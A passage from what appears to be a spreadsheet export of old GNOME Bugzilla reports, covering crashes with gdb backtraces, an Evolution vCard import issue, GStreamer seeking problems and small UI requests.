    at gtkwidget.c:2860
#23 0x401c7b82 in gtk_propagate_event (widget=0x80c4430 event=0x80d9688)
    at gtkmain.c:1313
#24 0x401c6dda in gtk_main_do_event (event=0x80d9688) at gtkmain.c:770
#25 0x4027150b in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffffa24 user_data=0x0) at gdkevents.c:2129
#26 0x403bbf96 in g_main_dispatch (dispatch_time=0xbffffa24) at gmain.c:656
#27 0x403bc561 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#28 0x403bc701 in g_main_run (loop=0x80cc540) at gmain.c:935
#29 0x401c6719 in gtk_main () at gtkmain.c:476
#30 0x80502d8 in main (argc=1 argv=0xbffffad4) at main.c:181
#0  0x405278e9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x405861ec in ?? () from /lib/libc.so.6
No symbol table info available.
#2  0x40084111 in gnome_segv_handle (signum=11) at gnome-init.c:655
estatus = 1076214176
signum = -512
in_segv = 1
pid = 0
#3  0x404b4c68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
No locals.
#4  0x403bd16d in g_free (mem=0x6279656b) at gmem.c:411
mem = 0xfffffe00
#5  0x80537ae in free_list (list=0x80e3768 udata=0x0) at splash.c:62
list = (GSList *) 0xfffffe00
#6  0x403c52a9 in g_slist_foreach (list=0x805d418 func=0x80537a0  
    user_data=0x0) at gslist.c:493
list = (GSList *) 0x62796563
user_data = 0x0
#7  0x80537f4 in splash_cleanup (o=0x80c9040 data=0x0) at splash.c:70
No locals.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 15:08 -------
This bug was previously known as bug 31371 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=31371
Originally filed under the gnome-core product and general component.
Unknown version 1.2.x in product gnome-core. Setting version to the default unspecified.
The original reporter (Martin.T.Kutschker@blackbox.net) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-core-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>Martin.T.Kutschker</t>
  </si>
  <si>
    <t>EVOLUTION-240013</t>
  </si>
  <si>
    <t>VCard Import Not Compliant: TEL (Phone) Property Not Handled Properly</t>
  </si>
  <si>
    <t>Description of Problem:
The evolution vcard import requires that a work and facsimile telephone no
be encoded in a certain manner that is not following the vcard RFC.
Steps to reproduce the problem:
1.  Create a vcard in a text file with a work and fax no such as:
TELWORK:123-123-1234
TELFAX:123-123-1234
2. Import the vcard via File--&gt;Import
Actual Results:
Examine the resulting contact to see that the telephone numbers were not
imported.  
Expected Results:
It should have been imported according to the vcard RFC but instead
evolution requires the telephone numbers to be encoded as follows:
TELWORKVOICE:123-123-1234
TELWORKFAX:123-123-1234
How often does this happen? 
Every Time.
Additional Information:
http://www.imc.org/pdi/vcard-21.ps
According to the RFC the telephone type can be BBS CAR CELL FAX HOME
ISDN MODEM MSG PAGER PREF VIDEO VOICE WORK or ANY combination of
those types.  There is no specification that WORK requires VOICE MESSAGE
or FAX and so on...</t>
  </si>
  <si>
    <t>EVOLUTION-346645</t>
  </si>
  <si>
    <t>missing mnemonic in mail/em-format-html-display.c</t>
  </si>
  <si>
    <t>Match case in mail/em-format-html-display.c misses a mnemonic.</t>
  </si>
  <si>
    <t>GSTREAMER-332155</t>
  </si>
  <si>
    <t>Seeking problems in .mov files</t>
  </si>
  <si>
    <t>Please describe the problem:
When seeking in some mov files with totem the video will freeze for 2-3 seconds
before continuing.
Also if you are near the end of the file and you try to seek further (for
example with right arrow key) it will bypass the end of the file and play a
black screen forever. (this lead to the counter telling you you are at 3:31 in a
3:00 movie)
Steps to reproduce:
1. download http://movies.collegehumor.com/items/2005/07/collegehumor.248333.mov
2. try to seek with the slider. See the freeze.
3. Go a few seconds before the end of the file and press -&gt;.
4. See the counter
Actual results:
Expected results:
No more freeze and no more eof bypass
Does this happen every time?
yes
Other information:
Just upgraded gstreamer0.10-plugins-bad to 0.10.1-0ubuntu1 in Ubuntu Dapper.
I'm just glad that those files are finally working with gstreamer. Thank you.
Keep the good work.</t>
  </si>
  <si>
    <t>GNOME-CORE-50970</t>
  </si>
  <si>
    <t>Closing certain applications</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  panel
Severity: normal
Version:  1.2.1
Synopsis: Closing certain applications
Class:    sw-bug
System: Linux 2.2.18 i586 unknown
C library: glibc-2.1.92-14
C compiler: 2.96
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.3
gnome-libs: gnome-libs 1.2.4
libxml: 1.8.9
gnome-print: gnome-print-0.20-8
gnome-core: gnome-core 1.2.1
Description:
The bug only happens when I right click on my GAIM-APPLET and click on
signoff
It signs me off and then about 2 seconds later Panel crashes.
Debugging information:
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...0x40603c39 in __wait4 () from /lib/libc.so.6
#0  0x40603c39 in __wait4 () from /lib/libc.so.6
#1  0x4066d53c in __DTOR_END__ () from /lib/libc.so.6
#2  0x40169b38 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  
#4  0x405cc88e in chunk_free (ar_ptr=0x4066ba00 p=0x817f928) at malloc.c:3117
#5  0x405cc5fc in __libc_free (mem=0x817f930) at malloc.c:3043
#6  0x4009fce2 in g_free () from /usr/lib/libglib-1.2.so.0
#7  0x402a91fc in gtk_label_finalize () from /usr/lib/libgtk-1.2.so.0
#8  0x402cb158 in gtk_object_unref () from /usr/lib/libgtk-1.2.so.0
#9  0x402c8db1 in gtk_object_destroy () from /usr/lib/libgtk-1.2.so.0
#10 0x4031bfb9 in gtk_widget_destroy () from /usr/lib/libgtk-1.2.so.0
#11 0x4024e221 in gtk_box_forall () from /usr/lib/libgtk-1.2.so.0
#12 0x40271bb8 in gtk_container_foreach () from /usr/lib/libgtk-1.2.so.0
#13 0x402708a8 in gtk_container_destroy () from /usr/lib/libgtk-1.2.so.0
#14 0x402b68b3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#15 0x402e7f8c in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#16 0x402e5cf5 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#17 0x402c8e08 in gtk_object_shutdown () from /usr/lib/libgtk-1.2.so.0
#18 0x40323d9b in gtk_widget_shutdown () from /usr/lib/libgtk-1.2.so.0
#19 0x402c8da9 in gtk_object_destroy () from /usr/lib/libgtk-1.2.so.0
#20 0x4031bfb9 in gtk_widget_destroy () from /usr/lib/libgtk-1.2.so.0
#21 0x402bd0a1 in gtk_menu_item_forall () from /usr/lib/libgtk-1.2.so.0
#22 0x40271bb8 in gtk_container_foreach () from /usr/lib/libgtk-1.2.so.0
#23 0x402708a8 in gtk_container_destroy () from /usr/lib/libgtk-1.2.so.0
#24 0x402bb6b9 in gtk_menu_item_destroy () from /usr/lib/libgtk-1.2.so.0
#25 0x402b68b3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#26 0x402e7f8c in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#27 0x402e5cf5 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#28 0x402c8e08 in gtk_object_shutdown () from /usr/lib/libgtk-1.2.so.0
#29 0x40323d9b in gtk_widget_shutdown () from /usr/lib/libgtk-1.2.so.0
#30 0x402c8da9 in gtk_object_destroy () from /usr/lib/libgtk-1.2.so.0
#31 0x4031bfb9 in gtk_widget_destroy () from /usr/lib/libgtk-1.2.so.0
#32 0x402be56f in gtk_menu_shell_forall () from /usr/lib/libgtk-1.2.so.0
#33 0x40271bb8 in gtk_container_foreach () from /usr/lib/libgtk-1.2.so.0
#34 0x402708a8 in gtk_container_destroy () from /usr/lib/libgtk-1.2.so.0
#35 0x402b6f23 in gtk_menu_destroy () from /usr/lib/libgtk-1.2.so.0
#36 0x402b68b3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#37 0x402e7f8c in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#38 0x402e5cf5 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#39 0x402c8e08 in gtk_object_shutdown () from /usr/lib/libgtk-1.2.so.0
#40 0x40323d9b in gtk_widget_shutdown () from /usr/lib/libgtk-1.2.so.0
#41 0x402c8da9 in gtk_object_destroy () from /usr/lib/libgtk-1.2.so.0
#42 0x4031bfb9 in gtk_widget_destroy () from /usr/lib/libgtk-1.2.so.0
#43 0x402bb660 in gtk_menu_item_destroy () from /usr/lib/libgtk-1.2.so.0
#44 0x402b68b3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#45 0x402e7f8c in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#46 0x402e5cf5 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#47 0x402c8e08 in gtk_object_shutdown () from /usr/lib/libgtk-1.2.so.0
#48 0x40323d9b in gtk_widget_shutdown () from /usr/lib/libgtk-1.2.so.0
#49 0x402c8da9 in gtk_object_destroy () from /usr/lib/libgtk-1.2.so.0
#50 0x4031bfb9 in gtk_widget_destroy () from /usr/lib/libgtk-1.2.so.0
#51 0x402be56f in gtk_menu_shell_forall () from /usr/lib/libgtk-1.2.so.0
#52 0x40271bb8 in gtk_container_foreach () from /usr/lib/libgtk-1.2.so.0
#53 0x402708a8 in gtk_container_destroy () from /usr/lib/libgtk-1.2.so.0
#54 0x402b6f23 in gtk_menu_destroy () from /usr/lib/libgtk-1.2.so.0
#55 0x402b68b3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#56 0x402e7f8c in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#57 0x402e5cf5 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#58 0x402c8e08 in gtk_object_shutdown () from /usr/lib/libgtk-1.2.so.0
#59 0x40323d9b in gtk_widget_shutdown () from /usr/lib/libgtk-1.2.so.0
#60 0x402c8da9 in gtk_object_destroy () from /usr/lib/libgtk-1.2.so.0
#61 0x4031bfb9 in gtk_widget_destroy () from /usr/lib/libgtk-1.2.so.0
#62 0x402bb660 in gtk_menu_item_destroy () from /usr/lib/libgtk-1.2.so.0
#63 0x402b68b3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#64 0x402e7f8c in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#65 0x402e5cf5 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#66 0x402c8e08 in gtk_object_shutdown () from /usr/lib/libgtk-1.2.so.0
#67 0x40323d9b in gtk_widget_shutdown () from /usr/lib/libgtk-1.2.so.0
#68 0x402c8da9 in gtk_object_destroy () from /usr/lib/libgtk-1.2.so.0
#69 0x4031bfb9 in gtk_widget_destroy () from /usr/lib/libgtk-1.2.so.0
#70 0x402be56f in gtk_menu_shell_forall () from /usr/lib/libgtk-1.2.so.0
#71 0x40271bb8 in gtk_container_foreach () from /usr/lib/libgtk-1.2.so.0
#72 0x402708a8 in gtk_container_destroy () from /usr/lib/libgtk-1.2.so.0
#73 0x402b6f23 in gtk_menu_destroy () from /usr/lib/libgtk-1.2.so.0
#74 0x402b68b3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#75 0x402e7f8c in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#76 0x402e5cf5 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#77 0x402c8e08 in gtk_object_shutdown () from /usr/lib/libgtk-1.2.so.0
#78 0x40323d9b in gtk_widget_shutdown () from /usr/lib/libgtk-1.2.so.0
#79 0x402c8da9 in gtk_object_destroy () from /usr/lib/libgtk-1.2.so.0
#80 0x402cb104 in gtk_object_unref () from /usr/lib/libgtk-1.2.so.0
#81 0x40324fd9 in gtk_widget_unref () from /usr/lib/libgtk-1.2.so.0
#82 0x8056383 in applet_remove_callback ()
#83 0x4002b69a in _ORBIT_skel_GNOME_PanelSpot_remove_callback ()
   from /usr/lib/libpanel_applet.so.0
#84 0x40061dd7 in ORBit_POA_handle_request () from /usr/lib/libORBit.so.0
#85 0x400641a7 in CORBA_ORB_run () from /usr/lib/libORBit.so.0
#86 0x400643e9 in CORBA_ORB_run () from /usr/lib/libORBit.so.0
#87 0x400824c9 in giop_main_handle_connection () from /usr/lib/libIIOP.so.0
#88 0x400f47f9 in orb_handle_connection () from /usr/lib/libgnorba.so.27
#89 0x4009d1a0 in g_io_unix_dispatch () from /usr/lib/libglib-1.2.so.0
#90 0x4009e987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#91 0x4009f001 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#92 0x4009f1cc in g_main_run () from /usr/lib/libglib-1.2.so.0
#93 0x402b4e57 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#94 0x8055aa0 in main ()
#95 0x40570790 in __libc_start_main (main=0x8055790  argc=5 
    ubp_av=0xbffffad4 init=0x8052f24  fini=0x8090f9c  
    rtld_fini=0x4000d35c  stack_end=0xbffffacc)
    at ../sysdeps/generic/libc-start.c:111
#0  0x40603c39 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x4066d53c in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x40169b38 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  
No locals.
#4  0x405cc88e in chunk_free (ar_ptr=0x4066ba00 p=0x817f928) at malloc.c:3117
hd = 4294966784
sz = 24
idx = 135788872
next = 0x817f940
nextsz = 72
prevsz = 4294966784
bck = 0x0
fwd = 0x64696c53
islr = 0
heap = (heap_info *) 0xbfffd7a0
hd = 4294966784
sz = 24
idx = 135788872
next = 0x817f940
nextsz = 72
prevsz = 4294966784
bck = 0x0
fwd = 0x64696c53
islr = 0
heap = (heap_info *) 0xbfffd7a0
heap = (heap_info *) 0xbfffd7a0
#5  0x405cc5fc in __libc_free (mem=0x817f930) at malloc.c:3043
3043	in malloc.c
mem = (void *) 0x0
ar_ptr = (arena *) 0x4066ba00
p = 0x817f928
ar_ptr = (arena *) 0x4066ba00
p = 0x817f928
#6  0x4009fce2 in g_free () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#7  0x402a91fc in gtk_label_finalize () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-02-16 19:48 -------
Unknown version 1.2.x in product gnome-core. Setting version to the default unspecified.
The original reporter (xxparan0iaxx@hotmail.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>xxparan0iaxx</t>
  </si>
  <si>
    <t>VTE-147495</t>
  </si>
  <si>
    <t>screen flicker when opening new terminal windows</t>
  </si>
  <si>
    <t>1. Make sure your profile has a white (or any non-black) background
2. Open a new gnome-terminal window
Notice that the window content has black background which is shortly replaced
with white background.  This is mildly irritating.</t>
  </si>
  <si>
    <t>GNOME-THEMES-143047</t>
  </si>
  <si>
    <t>no Low Contrast icons for a11y themeing (Archive Manager)</t>
  </si>
  <si>
    <t>Using Gnome built with gnome-panel 2.6.1 source tarball
- Change the theme to High Contrast Large Print Inverse
- Open main menu and go to Applications-&gt; Accessories 
 Notice that the Archive Manager icon does not change to suit this accessible
theme.
It should have the following versions:
  High Contrast
  High Contrast Inverse
  Low Contrast
  Low Contrast Inverse</t>
  </si>
  <si>
    <t>NETWORKMANAGER-769446</t>
  </si>
  <si>
    <t>nm-connection-editor</t>
  </si>
  <si>
    <t>c-e: Hide firewall zone combo when firewalld is not running</t>
  </si>
  <si>
    <t>This is a follow-up to control center bug #763477.</t>
  </si>
  <si>
    <t>GSTREAMER-173007</t>
  </si>
  <si>
    <t>[faad] Failed to decode buffer: Channel coupling not yet implemented</t>
  </si>
  <si>
    <t>Please describe the problem:
http://stream.state.gov/streamvol/journals/fullversion.mov
Doesn't play.
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>MONKEY-BUBBLE-349957</t>
  </si>
  <si>
    <t>Music and Sound Effects</t>
  </si>
  <si>
    <t>MONKEY-BUBBLE</t>
  </si>
  <si>
    <t>Sound Effects are not played</t>
  </si>
  <si>
    <t>When playing monkey-bubble 0.4.0 I only hear the background music. Even if the command line prints info about the effects (they are called 0 1 2 and 3) I can't hear anything.</t>
  </si>
  <si>
    <t>laurent.belmonte</t>
  </si>
  <si>
    <t>GNOME-APPLETS-141484</t>
  </si>
  <si>
    <t>Tooltip is not present</t>
  </si>
  <si>
    <t>Tooltip is not present for modemlights applet.</t>
  </si>
  <si>
    <t>GNOME-CORE-57562</t>
  </si>
  <si>
    <t>KDE menus faulty after upgrade to RH 7.1</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-core
Severity: normal
Version: 1.4.0.2
Synopsis: KDE menus faulty after upgrade to RH 7.1
Bugzilla-Product: gnome-core
Bugzilla-Component: panel
Description:
Since upgrading to RH 7.1 (running Ximian Gnome desktop) my KDE menus:
	- no longer have icons
	- mostly don't work anthough some still do
I realize that this is probably some stupid configuration issue that I'm too thick to figure out but I'm an aging newbie whose spent way too much time in Windozeland without a helmet so please be gentle
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-07-14 19:13 -------
The original reporter (Doug@localhost.localdomain) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>GNUMERIC-159107</t>
  </si>
  <si>
    <t>docs of preferences outdated</t>
  </si>
  <si>
    <t>It seems that some new images for the preference dialog have recently been added
to cvs. Unfortunately they seem to be slight modification of the images from an
earlier version. The current dialog looks slightly different. THe text on the
other hand seems to refer to a mixture.
Specifically 10.2.3 and 10.2.7 are both called `Windows Preferences'.</t>
  </si>
  <si>
    <t>EVOLUTION-201568</t>
  </si>
  <si>
    <t>Save As.. should be in file menu</t>
  </si>
  <si>
    <t>Currently you have to use the context menu on an email message to get to the
Save As.. dialog. This should also appear in the file menu</t>
  </si>
  <si>
    <t>rusty</t>
  </si>
  <si>
    <t>EVOLUTION-273905</t>
  </si>
  <si>
    <t>please don't overwrite my categories every time</t>
  </si>
  <si>
    <t>Description of Problem:
  Every time i update evolution it overwrites/extends the possible
categories. It's a mess to set them up new everytime - it acutally ended up
that i did not use them. ( another reason i dont use them at the moment is
http://bugzilla.gnome.org/show_bug.cgi?id=273799 )
Steps to reproduce the problem:
...
Actual Results:
categories are defaulted with every evolution update
Expected Results:
import my own categories and if possible extend them with a diff of the old
version default categories and the new default categories.
How often does this happen? 
every time evolution is updated
Additional Information:
...</t>
  </si>
  <si>
    <t>sven.bugzilla.2008</t>
  </si>
  <si>
    <t>RHYTHMBOX-381839</t>
  </si>
  <si>
    <t>Handle queries with Unknown Year better</t>
  </si>
  <si>
    <t>Currently an automatic playlist with Year in 0 throws up various criticals:
(rhythmbox:17821): GLib-CRITICAL **: g_date_set_dmy: assertion `g_date_valid_dmy (day m y)' failed
(rhythmbox:17821): GLib-CRITICAL **: g_date_get_julian: assertion `g_date_valid (d)' failed
(rhythmbox:17821): GLib-CRITICAL **: g_date_set_julian: assertion `g_date_valid_julian (j)' failed
The backtrace reveals that this is due to the various date functions not liking 0 as a Year (although the query works in the sense that it finds tracks that do not have the Year set and therefore appear as Unknown in the UI):
#0  0x0095b402 in __kernel_vsyscall ()
#1  0x00c680d1 in raise () from /lib/libpthread.so.0
#2  0x080e8419 in rb_debug_stop_in_debugger () at /home/alex/src/remote-cvs/gnome.org/rhythmbox/lib/rb-debug.c:154
#3  0x080e8481 in log_handler (domain=0x48555c6 GLib level=G_LOG_LEVEL_CRITICAL 
    message=0x9b7a238 g_date_set_julian: assertion `g_date_valid_julian (j)' failed data=0x0)
    at /home/alex/src/remote-cvs/gnome.org/rhythmbox/lib/rb-debug.c:171
#4  0x04831af7 in g_logv () from /lib/libglib-2.0.so.0
#5  0x04831cc9 in g_log () from /lib/libglib-2.0.so.0
#6  0x04831dab in g_return_if_fail_warning () from /lib/libglib-2.0.so.0
#7  0x04817714 in g_date_set_julian () from /lib/libglib-2.0.so.0
#8  0x080d1713 in rhythmdb_query_preprocess (db=0x94eb010 query=0x97bced0) at /home/alex/src/remote-cvs/gnome.org/rhythmbox/rhythmdb/rhythmdb-query.c:637
#9  0x080d16af in rhythmdb_query_preprocess (db=0x94eb010 query=0x97d6350) at /home/alex/src/remote-cvs/gnome.org/rhythmbox/rhythmdb/rhythmdb-query.c:599
#10 0x080d909d in rhythmdb_query_model_set_property (object=0x9b70ce8 prop_id=2 value=0xbfdd0d24 pspec=0x958a6a0)
    at /home/alex/src/remote-cvs/gnome.org/rhythmbox/rhythmdb/rhythmdb-query-model.c:454
#11 0x048adbbe in g_object_set_valist () from /lib/libgobject-2.0.so.0
#12 0x048ae056 in g_object_set () from /lib/libgobject-2.0.so.0
#13 0x080d70d6 in rhythmdb_query_model_set_query (results=0x9b70ce8 query=0x979ba30)
    at /home/alex/src/remote-cvs/gnome.org/rhythmbox/rhythmdb/rhythmdb-query-model.c:1857
#14 0x080d9590 in rhythmdb_query_results_set_query (results=0x9b70ce8 query=0x979ba30)
    at /home/alex/src/remote-cvs/gnome.org/rhythmbox/rhythmdb/rhythmdb-query-results.c:55
#15 0x080c87af in rhythmdb_do_full_query_async_parsed (db=0x94eb010 results=0x9b70ce8 query=0x979ba30)
    at /home/alex/src/remote-cvs/gnome.org/rhythmbox/rhythmdb/rhythmdb.c:3382
#16 0x08099ef5 in rb_auto_playlist_source_set_query (source=0x958d458 query=0x97b5b50 limit_type=RHYTHMDB_QUERY_MODEL_LIMIT_NONE limit_value=0x9b6e908 
    sort_key=0x9b6e918 Artist sort_direction=0) at /home/alex/src/remote-cvs/gnome.org/rhythmbox/sources/rb-auto-playlist-source.c:746
#17 0x0809b74c in rb_auto_playlist_source_new_from_xml (shell=0x94ea008 node=0x9a40740)
    at /home/alex/src/remote-cvs/gnome.org/rhythmbox/sources/rb-auto-playlist-source.c:351
#18 0x080981e9 in rb_playlist_source_new_from_xml (shell=0x94ea008 node=0x9a40740)
    at /home/alex/src/remote-cvs/gnome.org/rhythmbox/sources/rb-playlist-source.c:646
#19 0x0807eade in rb_playlist_manager_load_playlists (mgr=0x95e8080) at /home/alex/src/remote-cvs/gnome.org/rhythmbox/shell/rb-playlist-manager.c:687
#20 0x0806d1ce in idle_handle_load_complete (shell=0x94ea008) at /home/alex/src/remote-cvs/gnome.org/rhythmbox/shell/rb-shell.c:2414
#21 0x048275e1 in g_source_is_destroyed () from /lib/libglib-2.0.so.0
#22 0x04829342 in g_main_context_dispatch () from /lib/libglib-2.0.so.0
#23 0x0482c31f in g_main_context_check () from /lib/libglib-2.0.so.0
#24 0x0482c6c9 in g_main_loop_run () from /lib/libglib-2.0.so.0
#25 0x05e3dbe4 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#26 0x08067877 in main (argc=3 argv=0xbfdd11d4) at /home/alex/src/remote-cvs/gnome.org/rhythmbox/shell/main.c:382
We probably need to special case this more for the Year=0 case and figure out how this integrates with bug #328971 better.</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-51838</t>
  </si>
  <si>
    <t xml:space="preserve">Package: control-center
Severity: normal
Version: 1.2.3
Synopsis: Control Center Crash
Bugzilla-Product: control-center
Bugzilla-Component: general
Description:
Don't know what is happening here.  I was playing with the control center and it hung then I rebooted my machine.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-03-07 18:32 -------
Unknown version 1.2.x in product control-center. Setting version to the default unspecified.
The original reporter (ronald@hisbest.EBay.Sun.COM) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component control-center-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>ronald</t>
  </si>
  <si>
    <t>GNOME-CORE-31019</t>
  </si>
  <si>
    <t>panel crashes constantly</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  panel
Severity: normal
Version:  1.2.3
Synopsis: panel crashes constantly
Class:    sw-bug
Distribution: Red Hat Linux release 7.0 (Guinness)
System: Linux 2.2.16-22 i686 unknown
C library: glibc-2.1.94-3
C compiler: 2.96
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.4
gnome-libs: gnome-libs 1.2.8
libxml: 1.8.10
gnome-print: gnome-print-0.20-8_helix_1
gnome-core: gnome-core 1.2.3
Description:
panel crashed again it crashes every couple mintues
Debugging information:
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...0x4060aca9 in __wait4 () from /lib/libc.so.6
#0  0x4060aca9 in __wait4 () from /lib/libc.so.6
#1  0x40673740 in __DTOR_END__ () from /lib/libc.so.6
#2  0x4016df58 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  
#4  0x405d136a in _IO_str_init_static (sf=0xbfffef60 ptr=0x0 size=0 
    pstart=0x0) at ../sysdeps/i386/bits/string.h:342
#5  0x405c7ba2 in _IO_vsscanf (string=0x0 
    format=0x406f8a42 %*s %*s %*s %*s %d %*s %d args=0xbffff048)
    at iovsscanf.c:43
#6  0x405bb595 in sscanf (s=0x0 format=0x406f8a42 %*s %*s %*s %*s %d %*s %d)
    at sscanf.c:38
#7  0x406f55a0 in imap_check () from /usr/lib/libgen_util_applet.so
#8  0x406f18b7 in check_mail_file_status () from /usr/lib/libgen_util_applet.so
#9  0x406f1c6c in mail_check_timeout () from /usr/lib/libgen_util_applet.so
#10 0x400a3983 in g_timeout_dispatch () from /usr/lib/libglib-1.2.so.0
#11 0x400a2987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#12 0x400a3001 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#13 0x400a31cc in g_main_run () from /usr/lib/libglib-1.2.so.0
#14 0x402b9f87 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#15 0x8056012 in main ()
#16 0x40575a2c in __libc_start_main (main=0x8055d00  argc=5 
    ubp_av=0xbffff704 init=0x8053310  fini=0x80935cc  
    rtld_fini=0x4000d3c8  stack_end=0xbffff6fc)
    at ../sysdeps/generic/libc-start.c:111
#0  0x4060aca9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40673740 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x4016df58 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  
No locals.
#4  0x405d136a in _IO_str_init_static (sf=0xbfffef60 ptr=0x0 size=0 
    pstart=0x0) at ../sysdeps/i386/bits/string.h:342
s = -1073746448
ptr = 0x0
size = 0
#5  0x405c7ba2 in _IO_vsscanf (string=0x0 
    format=0x406f8a42 %*s %*s %*s %*s %d %*s %d args=0xbffff048)
    at iovsscanf.c:43
string = 0x0
ret = -512
sf = {_sbf = {_f = {_flags = -72548352 _IO_read_ptr = 0x0 
      _IO_read_end = 0x0 _IO_read_base = 0x0 _IO_write_base = 0x0 
      _IO_write_ptr = 0x0 _IO_write_end = 0x0 _IO_buf_base = 0x0 
      _IO_buf_end = 0x0 _IO_save_base = 0x0 _IO_backup_base = 0x0 
      _IO_save_end = 0x0 _markers = 0x0 _chain = 0x0 _fileno = 0 
      _blksize = 255 _old_offset = 1081064160 _cur_column = 0 
      _vtable_offset = 0 '\000' _shortbuf =  _lock = 0xbfffef40 
      _offset = 0 _codecvt = 0x0 _wide_data = 0x0 _mode = -1 
      _unused2 = '\000' } _vtable = 0x406719a0} _s = {
    _allocate_buffer = 0 _free_buffer = 0}}
lock = {__m_reserved = 27 __m_count = -1073746073 __m_owner = 0x1 
  __m_kind = 1081036609 __m_lock = {__status = 135636220 
    __spinlock = -1073746072}}
#6  0x405bb595 in sscanf (s=0x0 format=0x406f8a42 %*s %*s %*s %*s %d %*s %d)
    at sscanf.c:38
done = -512
#7  0x406f55a0 in imap_check () from /usr/lib/libgen_util_applet.so
No symbol table info available.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 13:16 -------
This bug was previously known as bug 31019 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=31019
Originally filed under the gnome-core product and panel component.
Unknown version 1.2.x in product gnome-core. Setting version to the default unspecified.
The original reporter (arielb@rice.edu) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>arielb</t>
  </si>
  <si>
    <t>EVOLUTION-525506</t>
  </si>
  <si>
    <t>Evolution Mail and Calendar: Evolution stalled so I h...</t>
  </si>
  <si>
    <t>Evolution stalled so I had to kill it.
Now I'm missing the preview pane and can't figure oute how to recover it
making the mailer useless.
Distribution: Ubuntu 8.04 (hardy)
Gnome Release: 2.22.0 2008-03-28 (Ubuntu)
BugBuddy Version: 2.22.0</t>
  </si>
  <si>
    <t>ldng</t>
  </si>
  <si>
    <t>EVOLUTION-231774</t>
  </si>
  <si>
    <t>Reselecting options for remider crashes calendar</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Steps to reproduce the problem:
1. Create new appointment
2. Selection Options in Reminder Tab
3. Enter some text and select OK in Message Alarm Option dialog
4. Do NOT select Add
5. Select Options Again
6. Select OK in Message Alarm Option dialog
7. CRASH
How often does this happen? 
Everytime
Additional Information:
STACK
